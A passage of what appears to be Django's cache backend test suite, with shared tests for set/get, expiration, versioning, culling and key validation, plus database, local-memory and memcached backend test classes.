key]) _caches_setting_base = { 'default': {}, 'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())}, 'v2': {'VERSION': 2}, 'custom_key': {'KEY_FUNCTION': custom_key_func}, 'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'}, 'cull': {'OPTIONS': {'MAX_ENTRIES': 30}}, 'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}}, } def caches_setting_for_tests(base=None, exclude=None, **params): # `base` is used to pull in the memcached config from the original settings, # `exclude` is a set of cache names denoting which `_caches_setting_base` keys # should be omitted. # `params` are test specific overrides and `_caches_settings_base` is the # base config for the tests. # This results in the following search order: # params -> _caches_setting_base -> base base = base or {} exclude = exclude or set() setting = {k: base.copy() for k in _caches_setting_base if k not in exclude} for key, cache_params in setting.items(): cache_params.update(_caches_setting_base[key]) cache_params.update(params) return setting class BaseCacheTests: # A common set of tests to apply to all cache backends def setUp(self): self.factory = RequestFactory() def tearDown(self): cache.clear() def test_simple(self): # Simple cache set/get works cache.set("key", "value") self.assertEqual(cache.get("key"), "value") def test_add(self): # A key can be added to a cache cache.add("addkey1", "value") result = cache.add("addkey1", "newvalue") self.assertFalse(result) self.assertEqual(cache.get("addkey1"), "value") def test_prefix(self): # Test for same cache key conflicts between shared backend cache.set('somekey', 'value') # should not be set in the prefixed cache self.assertFalse(caches['prefix'].has_key('somekey')) caches['prefix'].set('somekey', 'value2') self.assertEqual(cache.get('somekey'), 'value') self.assertEqual(caches['prefix'].get('somekey'), 'value2') def test_non_existent(self): """Nonexistent cache keys return as None/default.""" self.assertIsNone(cache.get("does_not_exist")) self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!") def test_get_many(self): # Multiple cache keys can be returned using get_many cache.set('a', 'a') cache.set('b', 'b') cache.set('c', 'c') cache.set('d', 'd') self.assertEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'}) self.assertEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'}) def test_delete(self): # Cache keys can be deleted cache.set("key1", "spam") cache.set("key2", "eggs") self.assertEqual(cache.get("key1"), "spam") cache.delete("key1") self.assertIsNone(cache.get("key1")) self.assertEqual(cache.get("key2"), "eggs") def test_has_key(self): # The cache can be inspected for cache keys cache.set("hello1", "goodbye1") self.assertTrue(cache.has_key("hello1")) self.assertFalse(cache.has_key("goodbye1")) cache.set("no_expiry", "here", None) self.assertTrue(cache.has_key("no_expiry")) def test_in(self): # The in operator can be used to inspect cache contents cache.set("hello2", "goodbye2") self.assertIn("hello2", cache) self.assertNotIn("goodbye2", cache) def test_incr(self): # Cache values can be incremented cache.set('answer', 41) self.assertEqual(cache.incr('answer'), 42) self.assertEqual(cache.get('answer'), 42) self.assertEqual(cache.incr('answer', 10), 52) self.assertEqual(cache.get('answer'), 52) self.assertEqual(cache.incr('answer', -10), 42) with self.assertRaises(ValueError): cache.incr('does_not_exist') def test_decr(self): # Cache values can be decremented cache.set('answer', 43) self.assertEqual(cache.decr('answer'), 42) self.assertEqual(cache.get('answer'), 42) self.assertEqual(cache.decr('answer', 10), 32) self.assertEqual(cache.get('answer'), 32) self.assertEqual(cache.decr('answer', -10), 42) with self.assertRaises(ValueError): cache.decr('does_not_exist') def test_close(self): self.assertTrue(hasattr(cache, 'close')) cache.close() def test_data_types(self): # Many different data types can be cached stuff = { 'string': 'this is a string', 'int': 42, 'list': [1, 2, 3, 4], 'tuple': (1, 2, 3, 4), 'dict': {'A': 1, 'B': 2}, 'function': f, 'class': C, } cache.set("stuff", stuff) self.assertEqual(cache.get("stuff"), stuff) def test_cache_read_for_model_instance(self): # Don't want fields with callable as default to be called on cache read expensive_calculation.num_runs = 0 Poll.objects.all().delete() my_poll = Poll.objects.create(question="Well?") self.assertEqual(Poll.objects.count(), 1) pub_date = my_poll.pub_date cache.set('question', my_poll) cached_poll = cache.get('question') self.assertEqual(cached_poll.pub_date, pub_date) # We only want the default expensive calculation run once self.assertEqual(expensive_calculation.num_runs, 1) def test_cache_write_for_model_instance_with_deferred(self): # Don't want fields with callable as default to be called on cache write expensive_calculation.num_runs = 0 Poll.objects.all().delete() Poll.objects.create(question="What?") self.assertEqual(expensive_calculation.num_runs, 1) defer_qs = Poll.objects.all().defer('question') self.assertEqual(defer_qs.count(), 1) self.assertEqual(expensive_calculation.num_runs, 1) cache.set('deferred_queryset', defer_qs) # cache set should not re-evaluate default functions self.assertEqual(expensive_calculation.num_runs, 1) def test_cache_read_for_model_instance_with_deferred(self): # Don't want fields with callable as default to be called on cache read expensive_calculation.num_runs = 0 Poll.objects.all().delete() Poll.objects.create(question="What?") self.assertEqual(expensive_calculation.num_runs, 1) defer_qs = Poll.objects.all().defer('question') self.assertEqual(defer_qs.count(), 1) cache.set('deferred_queryset', defer_qs) self.assertEqual(expensive_calculation.num_runs, 1) runs_before_cache_read = expensive_calculation.num_runs cache.get('deferred_queryset') # We only want the default expensive calculation run on creation and set self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read) def test_expiration(self): # Cache values can be set to expire cache.set('expire1', 'very quickly', 1) cache.set('expire2', 'very quickly', 1) cache.set('expire3', 'very quickly', 1) time.sleep(2) self.assertIsNone(cache.get("expire1")) cache.add("expire2", "newvalue") self.assertEqual(cache.get("expire2"), "newvalue") self.assertFalse(cache.has_key("expire3")) def test_unicode(self): # Unicode values can be cached stuff = { 'ascii': 'ascii_value', 'unicode_ascii': 'Iñtërnâtiônàlizætiøn1', 'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2', 'ascii2': {'x': 1} } # Test `set` for (key, value) in stuff.items(): with self.subTest(key=key): cache.set(key, value) self.assertEqual(cache.get(key), value) # Test `add` for (key, value) in stuff.items(): with self.subTest(key=key): cache.delete(key) cache.add(key, value) self.assertEqual(cache.get(key), value) # Test `set_many` for (key, value) in stuff.items(): cache.delete(key) cache.set_many(stuff) for (key, value) in stuff.items(): with self.subTest(key=key): self.assertEqual(cache.get(key), value) def test_binary_string(self): # Binary strings should be cacheable from zlib import compress, decompress value = 'value_to_be_compressed' compressed_value = compress(value.encode()) # Test set cache.set('binary1', compressed_value) compressed_result = cache.get('binary1') self.assertEqual(compressed_value, compressed_result) self.assertEqual(value, decompress(compressed_result).decode()) # Test add cache.add('binary1-add', compressed_value) compressed_result = cache.get('binary1-add') self.assertEqual(compressed_value, compressed_result) self.assertEqual(value, decompress(compressed_result).decode()) # Test set_many cache.set_many({'binary1-set_many': compressed_value}) compressed_result = cache.get('binary1-set_many') self.assertEqual(compressed_value, compressed_result) self.assertEqual(value, decompress(compressed_result).decode()) def test_set_many(self): # Multiple keys can be set using set_many cache.set_many({"key1": "spam", "key2": "eggs"}) self.assertEqual(cache.get("key1"), "spam") self.assertEqual(cache.get("key2"), "eggs") def test_set_many_returns_empty_list_on_success(self): """set_many() returns an empty list when all keys are inserted.""" failing_keys = cache.set_many({'key1': 'spam', 'key2': 'eggs'}) self.assertEqual(failing_keys, []) def test_set_many_expiration(self): # set_many takes a second ``timeout`` parameter cache.set_many({"key1": "spam", "key2": "eggs"}, 1) time.sleep(2) self.assertIsNone(cache.get("key1")) self.assertIsNone(cache.get("key2")) def test_delete_many(self): # Multiple keys can be deleted using delete_many cache.set("key1", "spam") cache.set("key2", "eggs") cache.set("key3", "ham") cache.delete_many(["key1", "key2"]) self.assertIsNone(cache.get("key1")) self.assertIsNone(cache.get("key2")) self.assertEqual(cache.get("key3"), "ham") def test_clear(self): # The cache can be emptied using clear cache.set("key1", "spam") cache.set("key2", "eggs") cache.clear() self.assertIsNone(cache.get("key1")) self.assertIsNone(cache.get("key2")) def test_long_timeout(self): """ Followe memcached's convention where a timeout greater than 30 days is treated as an absolute expiration timestamp instead of a relative offset (#12399). """ cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second self.assertEqual(cache.get('key1'), 'eggs') cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1) self.assertEqual(cache.get('key2'), 'ham') cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1) self.assertEqual(cache.get('key3'), 'sausage') self.assertEqual(cache.get('key4'), 'lobster bisque') def test_forever_timeout(self): """ Passing in None into timeout results in a value that is cached forever """ cache.set('key1', 'eggs', None) self.assertEqual(cache.get('key1'), 'eggs') cache.add('key2', 'ham', None) self.assertEqual(cache.get('key2'), 'ham') added = cache.add('key1', 'new eggs', None) self.assertIs(added, False) self.assertEqual(cache.get('key1'), 'eggs') cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None) self.assertEqual(cache.get('key3'), 'sausage') self.assertEqual(cache.get('key4'), 'lobster bisque') def test_zero_timeout(self): """ Passing in zero into timeout results in a value that is not cached """ cache.set('key1', 'eggs', 0) self.assertIsNone(cache.get('key1')) cache.add('key2', 'ham', 0) self.assertIsNone(cache.get('key2')) cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0) self.assertIsNone(cache.get('key3')) self.assertIsNone(cache.get('key4')) def test_float_timeout(self): # Make sure a timeout given as a float doesn't crash anything. cache.set("key1", "spam", 100.2) self.assertEqual(cache.get("key1"), "spam") def _perform_cull_test(self, cull_cache, initial_count, final_count): # Create initial cache key entries. This will overflow the cache, # causing a cull. for i in range(1, initial_count): cull_cache.set('cull%d' % i, 'value', 1000) count = 0 # Count how many keys are left in the cache. for i in range(1, initial_count): if cull_cache.has_key('cull%d' % i): count += 1 self.assertEqual(count, final_count) def test_cull(self): self._perform_cull_test(caches['cull'], 50, 29) def test_zero_cull(self): self._perform_cull_test(caches['zero_cull'], 50, 19) def _perform_invalid_key_test(self, key, expected_warning): """ All the builtin backends (except memcached, see below) should warn on keys that would be refused by memcached. This encourages portable caching code without making it too difficult to use production backends with more liberal key rules. Refs #6447. """ # mimic custom ``make_key`` method being defined since the default will # never show the below warnings def func(key, *args): return key old_func = cache.key_func cache.key_func = func try: with warnings.catch_warnings(record=True) as w: warnings.simplefilter("always") cache.set(key, 'value') self.assertEqual(len(w), 1) self.assertIsInstance(w[0].message, CacheKeyWarning) self.assertEqual(str(w[0].message.args[0]), expected_warning) finally: cache.key_func = old_func def test_invalid_key_characters(self): # memcached doesn't allow whitespace or control characters in keys. key = 'key with spaces and 清' self._perform_invalid_key_test(key, KEY_ERRORS_WITH_MEMCACHED_MSG % key) def test_invalid_key_length(self): # memcached limits key length to 250. key = ('a' * 250) + '清' expected_warning = ( 'Cache key will cause errors if used with memcached: ' '%r (longer than %s)' % (key, 250) ) self._perform_invalid_key_test(key, expected_warning) def test_cache_versioning_get_set(self): # set, using default version = 1 cache.set('answer1', 42) self.assertEqual(cache.get('answer1'), 42) self.assertEqual(cache.get('answer1', version=1), 42) self.assertIsNone(cache.get('answer1', version=2)) self.assertIsNone(caches['v2'].get('answer1')) self.assertEqual(caches['v2'].get('answer1', version=1), 42) self.assertIsNone(caches['v2'].get('answer1', version=2)) # set, default version = 1, but manually override version = 2 cache.set('answer2', 42, version=2) self.assertIsNone(cache.get('answer2')) self.assertIsNone(cache.get('answer2', version=1)) self.assertEqual(cache.get('answer2', version=2), 42) self.assertEqual(caches['v2'].get('answer2'), 42) self.assertIsNone(caches['v2'].get('answer2', version=1)) self.assertEqual(caches['v2'].get('answer2', version=2), 42) # v2 set, using default version = 2 caches['v2'].set('answer3', 42) self.assertIsNone(cache.get('answer3')) self.assertIsNone(cache.get('answer3', version=1)) self.assertEqual(cache.get('answer3', version=2), 42) self.assertEqual(caches['v2'].get('answer3'), 42) self.assertIsNone(caches['v2'].get('answer3', version=1)) self.assertEqual(caches['v2'].get('answer3', version=2), 42) # v2 set, default version = 2, but manually override version = 1 caches['v2'].set('answer4', 42, version=1) self.assertEqual(cache.get('answer4'), 42) self.assertEqual(cache.get('answer4', version=1), 42) self.assertIsNone(cache.get('answer4', version=2)) self.assertIsNone(caches['v2'].get('answer4')) self.assertEqual(caches['v2'].get('answer4', version=1), 42) self.assertIsNone(caches['v2'].get('answer4', version=2)) def test_cache_versioning_add(self): # add, default version = 1, but manually override version = 2 cache.add('answer1', 42, version=2) self.assertIsNone(cache.get('answer1', version=1)) self.assertEqual(cache.get('answer1', version=2), 42) cache.add('answer1', 37, version=2) self.assertIsNone(cache.get('answer1', version=1)) self.assertEqual(cache.get('answer1', version=2), 42) cache.add('answer1', 37, version=1) self.assertEqual(cache.get('answer1', version=1), 37) self.assertEqual(cache.get('answer1', version=2), 42) # v2 add, using default version = 2 caches['v2'].add('answer2', 42) self.assertIsNone(cache.get('answer2', version=1)) self.assertEqual(cache.get('answer2', version=2), 42) caches['v2'].add('answer2', 37) self.assertIsNone(cache.get('answer2', version=1)) self.assertEqual(cache.get('answer2', version=2), 42) caches['v2'].add('answer2', 37, version=1) self.assertEqual(cache.get('answer2', version=1), 37) self.assertEqual(cache.get('answer2', version=2), 42) # v2 add, default version = 2, but manually override version = 1 caches['v2'].add('answer3', 42, version=1) self.assertEqual(cache.get('answer3', version=1), 42) self.assertIsNone(cache.get('answer3', version=2)) caches['v2'].add('answer3', 37, version=1) self.assertEqual(cache.get('answer3', version=1), 42) self.assertIsNone(cache.get('answer3', version=2)) caches['v2'].add('answer3', 37) self.assertEqual(cache.get('answer3', version=1), 42) self.assertEqual(cache.get('answer3', version=2), 37) def test_cache_versioning_has_key(self): cache.set('answer1', 42) # has_key self.assertTrue(cache.has_key('answer1')) self.assertTrue(cache.has_key('answer1', version=1)) self.assertFalse(cache.has_key('answer1', version=2)) self.assertFalse(caches['v2'].has_key('answer1')) self.assertTrue(caches['v2'].has_key('answer1', version=1)) self.assertFalse(caches['v2'].has_key('answer1', version=2)) def test_cache_versioning_delete(self): cache.set('answer1', 37, version=1) cache.set('answer1', 42, version=2) cache.delete('answer1') self.assertIsNone(cache.get('answer1', version=1)) self.assertEqual(cache.get('answer1', version=2), 42) cache.set('answer2', 37, version=1) cache.set('answer2', 42, version=2) cache.delete('answer2', version=2) self.assertEqual(cache.get('answer2', version=1), 37) self.assertIsNone(cache.get('answer2', version=2)) cache.set('answer3', 37, version=1) cache.set('answer3', 42, version=2) caches['v2'].delete('answer3') self.assertEqual(cache.get('answer3', version=1), 37) self.assertIsNone(cache.get('answer3', version=2)) cache.set('answer4', 37, version=1) cache.set('answer4', 42, version=2) caches['v2'].delete('answer4', version=1) self.assertIsNone(cache.get('answer4', version=1)) self.assertEqual(cache.get('answer4', version=2), 42) def test_cache_versioning_incr_decr(self): cache.set('answer1', 37, version=1) cache.set('answer1', 42, version=2) cache.incr('answer1') self.assertEqual(cache.get('answer1', version=1), 38) self.assertEqual(cache.get('answer1', version=2), 42) cache.decr('answer1') self.assertEqual(cache.get('answer1', version=1), 37) self.assertEqual(cache.get('answer1', version=2), 42) cache.set('answer2', 37, version=1) cache.set('answer2', 42, version=2) cache.incr('answer2', version=2) self.assertEqual(cache.get('answer2', version=1), 37) self.assertEqual(cache.get('answer2', version=2), 43) cache.decr('answer2', version=2) self.assertEqual(cache.get('answer2', version=1), 37) self.assertEqual(cache.get('answer2', version=2), 42) cache.set('answer3', 37, version=1) cache.set('answer3', 42, version=2) caches['v2'].incr('answer3') self.assertEqual(cache.get('answer3', version=1), 37) self.assertEqual(cache.get('answer3', version=2), 43) caches['v2'].decr('answer3') self.assertEqual(cache.get('answer3', version=1), 37) self.assertEqual(cache.get('answer3', version=2), 42) cache.set('answer4', 37, version=1) cache.set('answer4', 42, version=2) caches['v2'].incr('answer4', version=1) self.assertEqual(cache.get('answer4', version=1), 38) self.assertEqual(cache.get('answer4', version=2), 42) caches['v2'].decr('answer4', version=1) self.assertEqual(cache.get('answer4', version=1), 37) self.assertEqual(cache.get('answer4', version=2), 42) def test_cache_versioning_get_set_many(self): # set, using default version = 1 cache.set_many({'ford1': 37, 'arthur1': 42}) self.assertEqual(cache.get_many(['ford1', 'arthur1']), {'ford1': 37, 'arthur1': 42}) self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42}) self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=2), {}) self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1']), {}) self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42}) self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {}) # set, default version = 1, but manually override version = 2 cache.set_many({'ford2': 37, 'arthur2': 42}, version=2) self.assertEqual(cache.get_many(['ford2', 'arthur2']), {}) self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=1), {}) self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42}) self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2']), {'ford2': 37, 'arthur2': 42}) self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {}) self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42}) # v2 set, using default version = 2 caches['v2'].set_many({'ford3': 37, 'arthur3': 42}) self.assertEqual(cache.get_many(['ford3', 'arthur3']), {}) self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=1), {}) self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42}) self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3']), {'ford3': 37, 'arthur3': 42}) self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {}) self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42}) # v2 set, default version = 2, but manually override version = 1 caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1) self.assertEqual(cache.get_many(['ford4', 'arthur4']), {'ford4': 37, 'arthur4': 42}) self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42}) self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=2), {}) self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4']), {}) self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42}) self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {}) def test_incr_version(self): cache.set('answer', 42, version=2) self.assertIsNone(cache.get('answer')) self.assertIsNone(cache.get('answer', version=1)) self.assertEqual(cache.get('answer', version=2), 42) self.assertIsNone(cache.get('answer', version=3)) self.assertEqual(cache.incr_version('answer', version=2), 3) self.assertIsNone(cache.get('answer')) self.assertIsNone(cache.get('answer', version=1)) self.assertIsNone(cache.get('answer', version=2)) self.assertEqual(cache.get('answer', version=3), 42) caches['v2'].set('answer2', 42) self.assertEqual(caches['v2'].get('answer2'), 42) self.assertIsNone(caches['v2'].get('answer2', version=1)) self.assertEqual(caches['v2'].get('answer2', version=2), 42) self.assertIsNone(caches['v2'].get('answer2', version=3)) self.assertEqual(caches['v2'].incr_version('answer2'), 3) self.assertIsNone(caches['v2'].get('answer2')) self.assertIsNone(caches['v2'].get('answer2', version=1)) self.assertIsNone(caches['v2'].get('answer2', version=2)) self.assertEqual(caches['v2'].get('answer2', version=3), 42) with self.assertRaises(ValueError): cache.incr_version('does_not_exist') def test_decr_version(self): cache.set('answer', 42, version=2) self.assertIsNone(cache.get('answer')) self.assertIsNone(cache.get('answer', version=1)) self.assertEqual(cache.get('answer', version=2), 42) self.assertEqual(cache.decr_version('answer', version=2), 1) self.assertEqual(cache.get('answer'), 42) self.assertEqual(cache.get('answer', version=1), 42) self.assertIsNone(cache.get('answer', version=2)) caches['v2'].set('answer2', 42) self.assertEqual(caches['v2'].get('answer2'), 42) self.assertIsNone(caches['v2'].get('answer2', version=1)) self.assertEqual(caches['v2'].get('answer2', version=2), 42) self.assertEqual(caches['v2'].decr_version('answer2'), 1) self.assertIsNone(caches['v2'].get('answer2')) self.assertEqual(caches['v2'].get('answer2', version=1), 42) self.assertIsNone(caches['v2'].get('answer2', version=2)) with self.assertRaises(ValueError): cache.decr_version('does_not_exist', version=2) def test_custom_key_func(self): # Two caches with different key functions aren't visible to each other cache.set('answer1', 42) self.assertEqual(cache.get('answer1'), 42) self.assertIsNone(caches['custom_key'].get('answer1')) self.assertIsNone(caches['custom_key2'].get('answer1')) caches['custom_key'].set('answer2', 42) self.assertIsNone(cache.get('answer2')) self.assertEqual(caches['custom_key'].get('answer2'), 42) self.assertEqual(caches['custom_key2'].get('answer2'), 42) def test_cache_write_unpicklable_object(self): update_middleware = UpdateCacheMiddleware() update_middleware.cache = cache fetch_middleware = FetchFromCacheMiddleware() fetch_middleware.cache = cache request = self.factory.get('/cache/test') request._cache_update_cache = True get_cache_data = FetchFromCacheMiddleware().process_request(request) self.assertIsNone(get_cache_data) response = HttpResponse() content = 'Testing cookie serialization.' response.content = content response.set_cookie('foo', 'bar') update_middleware.process_response(request, response) get_cache_data = fetch_middleware.process_request(request) self.assertIsNotNone(get_cache_data) self.assertEqual(get_cache_data.content, content.encode()) self.assertEqual(get_cache_data.cookies, response.cookies) update_middleware.process_response(request, get_cache_data) get_cache_data = fetch_middleware.process_request(request) self.assertIsNotNone(get_cache_data) self.assertEqual(get_cache_data.content, content.encode()) self.assertEqual(get_cache_data.cookies, response.cookies) def test_add_fail_on_pickleerror(self): # Shouldn't fail silently if trying to cache an unpicklable type. with self.assertRaises(pickle.PickleError): cache.add('unpicklable', Unpicklable()) def test_set_fail_on_pickleerror(self): with self.assertRaises(pickle.PickleError): cache.set('unpicklable', Unpicklable()) def test_get_or_set(self): self.assertIsNone(cache.get('projector')) self.assertEqual(cache.get_or_set('projector', 42), 42) self.assertEqual(cache.get('projector'), 42) self.assertEqual(cache.get_or_set('null', None), None) def test_get_or_set_callable(self): def my_callable(): return 'value' self.assertEqual(cache.get_or_set('mykey', my_callable), 'value') self.assertEqual(cache.get_or_set('mykey', my_callable()), 'value') def test_get_or_set_callable_returning_none(self): self.assertIsNone(cache.get_or_set('mykey', lambda: None)) # Previous get_or_set() doesn't store None in the cache. self.assertEqual(cache.get('mykey', 'default'), 'default') def test_get_or_set_version(self): msg = "get_or_set() missing 1 required positional argument: 'default'" cache.get_or_set('brian', 1979, version=2) with self.assertRaisesMessage(TypeError, msg): cache.get_or_set('brian') with self.assertRaisesMessage(TypeError, msg): cache.get_or_set('brian', version=1) self.assertIsNone(cache.get('brian', version=1)) self.assertEqual(cache.get_or_set('brian', 42, version=1), 42) self.assertEqual(cache.get_or_set('brian', 1979, version=2), 1979) self.assertIsNone(cache.get('brian', version=3)) def test_get_or_set_racing(self): with mock.patch('%s.%s' % (settings.CACHES['default']['BACKEND'], 'add')) as cache_add: # Simulate cache.add() failing to add a value. In that case, the # default value should be returned. cache_add.return_value = False self.assertEqual(cache.get_or_set('key', 'default'), 'default') @override_settings(CACHES=caches_setting_for_tests( BACKEND='django.core.cache.backends.db.DatabaseCache', # Spaces are used in the table name to ensure quoting/escaping is working LOCATION='test cache table' )) class DBCacheTests(BaseCacheTests, TransactionTestCase): available_apps = ['cache'] def setUp(self): # The super calls needs to happen first for the settings override. super().setUp() self.create_table() def tearDown(self): # The super call needs to happen first because it uses the database. super().tearDown() self.drop_table() def create_table(self): management.call_command('createcachetable', verbosity=0) def drop_table(self): with connection.cursor() as cursor: table_name = connection.ops.quote_name('test cache table') cursor.execute('DROP TABLE %s' % table_name) def test_zero_cull(self): self._perform_cull_test(caches['zero_cull'], 50, 18) def test_second_call_doesnt_crash(self): out = io.StringIO() management.call_command('createcachetable', stdout=out) self.assertEqual(out.getvalue(), "Cache table 'test cache table' already exists.\n" * len(settings.CACHES)) @override_settings(CACHES=caches_setting_for_tests( BACKEND='django.core.cache.backends.db.DatabaseCache', # Use another table name to avoid the 'table already exists' message. LOCATION='createcachetable_dry_run_mode' )) def test_createcachetable_dry_run_mode(self): out = io.StringIO() management.call_command('createcachetable', dry_run=True, stdout=out) output = out.getvalue() self.assertTrue(output.startswith("CREATE TABLE")) def test_createcachetable_with_table_argument(self): """ Delete and recreate cache table with legacy behavior (explicitly specifying the table name). """ self.drop_table() out = io.StringIO() management.call_command( 'createcachetable', 'test cache table', verbosity=2, stdout=out, ) self.assertEqual(out.getvalue(), "Cache table 'test cache table' created.\n") @override_settings(USE_TZ=True) class DBCacheWithTimeZoneTests(DBCacheTests): pass class DBCacheRouter: """A router that puts the cache table on the 'other' database.""" def db_for_read(self, model, **hints): if model._meta.app_label == 'django_cache': return 'other' return None def db_for_write(self, model, **hints): if model._meta.app_label == 'django_cache': return 'other' return None def allow_migrate(self, db, app_label, **hints): if app_label == 'django_cache': return db == 'other' return None @override_settings( CACHES={ 'default': { 'BACKEND': 'django.core.cache.backends.db.DatabaseCache', 'LOCATION': 'my_cache_table', }, }, ) class CreateCacheTableForDBCacheTests(TestCase): multi_db = True @override_settings(DATABASE_ROUTERS=[DBCacheRouter()]) def test_createcachetable_observes_database_router(self): # cache table should not be created on 'default' with self.assertNumQueries(0, using='default'): management.call_command('createcachetable', database='default', verbosity=0) # cache table should be created on 'other' # Queries: # 1: check table doesn't already exist # 2: create savepoint (if transactional DDL is supported) # 3: create the table # 4: create the index # 5: release savepoint (if transactional DDL is supported) num = 5 if connections['other'].features.can_rollback_ddl else 3 with self.assertNumQueries(num, using='other'): management.call_command('createcachetable', database='other', verbosity=0) class PicklingSideEffect: def __init__(self, cache): self.cache = cache self.locked = False def __getstate__(self): self.locked = self.cache._lock.locked() return {} limit_locmem_entries = override_settings(CACHES=caches_setting_for_tests( BACKEND='django.core.cache.backends.locmem.LocMemCache', OPTIONS={'MAX_ENTRIES': 9}, )) @override_settings(CACHES=caches_setting_for_tests( BACKEND='django.core.cache.backends.locmem.LocMemCache', )) class LocMemCacheTests(BaseCacheTests, TestCase): def setUp(self): super().setUp() # LocMem requires a hack to make the other caches # share a data store with the 'normal' cache. caches['prefix']._cache = cache._cache caches['prefix']._expire_info = cache._expire_info caches['v2']._cache = cache._cache caches['v2']._expire_info = cache._expire_info caches['custom_key']._cache = cache._cache caches['custom_key']._expire_info = cache._expire_info caches['custom_key2']._cache = cache._cache caches['custom_key2']._expire_info = cache._expire_info @override_settings(CACHES={ 'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'}, 'other': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', 'LOCATION': 'other' }, }) def test_multiple_caches(self): "Multiple locmem caches are isolated" cache.set('value', 42) self.assertEqual(caches['default'].get('value'), 42) self.assertIsNone(caches['other'].get('value')) def test_locking_on_pickle(self): """#20613/#18541 -- Ensures pickling is done outside of the lock.""" bad_obj = PicklingSideEffect(cache) cache.set('set', bad_obj) self.assertFalse(bad_obj.locked, "Cache was locked during pickling") cache.add('add', bad_obj) self.assertFalse(bad_obj.locked, "Cache was locked during pickling") def test_incr_decr_timeout(self): """incr/decr does not modify expiry time (matches memcached behavior)""" key = 'value' _key = cache.make_key(key) cache.set(key, 1, timeout=cache.default_timeout * 10) expire = cache._expire_info[_key] cache.incr(key) self.assertEqual(expire, cache._expire_info[_key]) cache.decr(key) self.assertEqual(expire, cache._expire_info[_key]) @limit_locmem_entries def test_lru_get(self): """get() moves cache keys.""" for key in range(9): cache.set(key, key, timeout=None) for key in range(6): self.assertEqual(cache.get(key), key) cache.set(9, 9, timeout=None) for key in range(6): self.assertEqual(cache.get(key), key) for key in range(6, 9): self.assertIsNone(cache.get(key)) self.assertEqual(cache.get(9), 9) @limit_locmem_entries def test_lru_set(self): """set() moves cache keys.""" for key in range(9): cache.set(key, key, timeout=None) for key in range(3, 9): cache.set(key, key, timeout=None) cache.set(9, 9, timeout=None) for key in range(3, 10): self.assertEqual(cache.get(key), key) for key in range(3): self.assertIsNone(cache.get(key)) @limit_locmem_entries def test_lru_incr(self): """incr() moves cache keys.""" for key in range(9): cache.set(key, key, timeout=None) for key in range(6): cache.incr(key) cache.set(9, 9, timeout=None) for key in range(6): self.assertEqual(cache.get(key), key + 1) for key in range(6, 9): self.assertIsNone(cache.get(key)) self.assertEqual(cache.get(9), 9) # memcached backend isn't guaranteed to be available. # To check the memcached backend, the test settings file will # need to contain at least one cache backend setting that points at # your memcache server. configured_caches = {} for _cache_params in settings.CACHES.values(): configured_caches[_cache_params['BACKEND']] = _cache_params MemcachedCache_params = configured_caches.get('django.core.cache.backends.memcached.MemcachedCache') PyLibMCCache_params = configured_caches.get('django.core.cache.backends.memcached.PyLibMCCache') # The memcached backends don't support cull-related options like `MAX_ENTRIES`. memcached_excluded_caches = {'cull', 'zero_cull'} class BaseMemcachedTests(BaseCacheTests): # By default it's assumed that the client doesn't clean up connections # properly, in which case the backend must do so after each request. should_disconnect_on_close = True def test_location_multiple_servers(self): locations = [ ['server1.tld', 'server2:11211'], 'server1.tld;server2:11211', 'server1.tld,server2:11211', ] for location in locations: with self.subTest(location=location): params = {'BACKEND': self.base_params['BACKEND'], 'LOCATION': location} with self.settings(CACHES={'default': params}): self.assertEqual(cache._servers, ['server1.tld', 'server2:11211']) def test_invalid_key_characters(self): """ On memcached, we don't introduce a duplicate key validation step (for speed reasons), we just let the memcached API library raise its own exception on bad keys. Refs #6447. In order to be memcached-API-library agnostic, we only assert that a generic exception of some kind is raised. """ # memcached does not allow whitespace or control characters in keys # when using the ascii protocol. with self.assertRaises(Exception): cache.set('key with spaces', 'value') def test_invalid_key_length(self): # memcached limits key length to 250 with self.assertRaises(Exception): cache.set('a' * 251, 'value') def test_default_never_expiring_timeout(self): # Regression test for #22845 with self.settings(CACHES=caches_setting_for_tests( base=self.base_params, exclude=memcached_excluded_caches, TIMEOUT=None)): cache.set('infinite_foo', 'bar') self.assertEqual(cache.get('infinite_foo'), 'bar') def test_default_far_future_timeout(self): # Regression test 